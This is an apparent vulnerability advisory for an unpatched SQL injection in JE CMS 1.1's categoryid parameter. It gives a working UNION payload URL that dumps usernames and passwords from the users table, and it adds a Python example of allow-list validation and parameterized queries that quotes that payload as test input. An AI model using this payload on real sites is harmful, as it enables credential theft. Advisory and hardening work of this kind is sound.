Vendor: JE CMS
By: AntiSecurity
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: JE CMS
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:joenasejes:je_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
JE CMS SQL Injection Vulnerability
An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request appends SQL statements to the vulnerable parameter, here categoryid on the viewcategory page, and the application executes them in the backend database. For example:
http://localhost/[path]/index.php?jepage=viewcategory&categoryid=[sql]
http://localhost/index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users--
Mitigation:
Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.
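
The mitigation above applied to the categoryid parameter, as an added example (not JE CMS code, which is PHP): Python with sqlite3 stands in for the application's database layer, and the table names, columns and rows are constructed assumptions. It validates the value against an allow-list first, then passes it as a bound parameter, so the request string quoted above is rejected and, even if validation were skipped, is only ever compared as data.

```python
import re
import sqlite3

# URL-decoded categoryid value from the example request quoted on this page.
PAGE_PAYLOAD = ("84 and 1=2 union all select "
                "1,group_concat(username,0x3a,password),3,4,5,6 from users--")

def make_demo_db():
    """Constructed schema and rows; JE CMS's real tables are not shown on the page."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, categoryid INTEGER, title TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO articles VALUES (1, 84, 'Welcome'), (2, 84, 'News'), (3, 7, 'Other');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return conn

# Allow-list: a plain decimal number of bounded length, nothing else.
_ID_RE = re.compile(r"[0-9]{1,9}")

def parse_category_id(raw):
    """Return categoryid as an int, or None if it is not a plain decimal number."""
    if isinstance(raw, str) and _ID_RE.fullmatch(raw):
        return int(raw)
    return None

def view_category(conn, raw_categoryid):
    """Hardened lookup: allow-list validation, then a bound parameter."""
    category_id = parse_category_id(raw_categoryid)
    if category_id is None:
        return None  # the caller should answer with HTTP 400
    cur = conn.execute(
        "SELECT id, title FROM articles WHERE categoryid = ? ORDER BY id",
        (category_id,),
    )
    return cur.fetchall()

def lookup_bound_only(conn, raw_categoryid):
    """No validation, binding only: the value is still compared as data, not parsed as SQL."""
    cur = conn.execute(
        "SELECT id, title FROM articles WHERE categoryid = ? ORDER BY id",
        (raw_categoryid,),
    )
    return cur.fetchall()

if __name__ == "__main__":
    db = make_demo_db()
    print(view_category(db, "84"), view_category(db, PAGE_PAYLOAD))
```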